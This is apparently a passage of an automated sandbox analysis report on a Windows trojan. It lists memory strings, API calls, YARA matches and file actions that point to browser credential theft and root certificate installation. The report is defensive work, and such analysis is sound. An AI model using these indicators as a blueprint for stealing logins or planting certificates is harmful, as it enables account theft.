Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorfL
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com;
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.364704865.0000000003F3A000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlymdVA
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/h
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364828716.0000000003F43000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetingsP)
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetingsn)H
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopK
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopKK
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364118495.0000000003F59000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteVOs
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra85.0.
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364704865.0000000003F3A000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Source: C:\Users\user\AppData\Roaming\1618258522437.exe

Code function: 11_2_0040AE4D OpenClipboard,

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 6.2.26FF190E7AE0F7C7.exe.3140000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 7.2.26FF190E7AE0F7C7.exe.3170000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 26FF190E7AE0F7C7.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A000 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019DA0 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019F60 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019FB0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Code function: 11_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Code function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00403660: DeviceIoControl,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403E2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004093D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000C073
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000B893
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10006100
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100099F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10007200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10016A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10009267
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10010AAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10008350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000ABB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000B3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000E3E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10008400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001EC30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000BC67
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000C493
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100105F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001EE3B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000FFD1
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000C073
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000B893
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10006100
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100099F0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10007200
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10016A1D
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10009267
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10010AAC
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10008350
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000ABB0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000B3C0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000E3E0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10008400
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001EC30
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000BC67
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000C493
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100105F0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001EE3B
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000FFD1
Source: C:\Users\user\AppData\Roaming\1618258522437.exe	Code function: 11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B96A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B99B7F

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: String function: 10010594 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: String function: 10010594 appears 35 times

Source: 1618258522437.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1618258522437.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000000.329269561.0000000000412000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354164203.0000000000730000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354674338.0000000002120000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000007.00000002.369233907.00000000025B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.355375911.00000000025D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.438715489.0000000002660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.2660000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.25d0000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.10000000.11.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.25b0000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.10000000.11.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 7.2.26FF190E7AE0F7C7.exe.25b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.25d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.2660000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.26FF190E7AE0F7C7.exe.3140000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 7.2.26FF190E7AE0F7C7.exe.3170000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal93.bank.troj.spyw.evad.winEXE@32/37@98/2

Source: C:\Users\user\AppData\Roaming\1618258522437.exe

Code function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification,

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 27_2_00B91058 CoCreateInstance,

Source: C:\Users\user\AppData\Roaming\1618258522437.exe

Code function: 11_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File created: C:\Users\user\AppData\Local\Login Data1618258522140

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

Jump to behavior

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1618258522437.exe

System information queried: HandleInformation

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
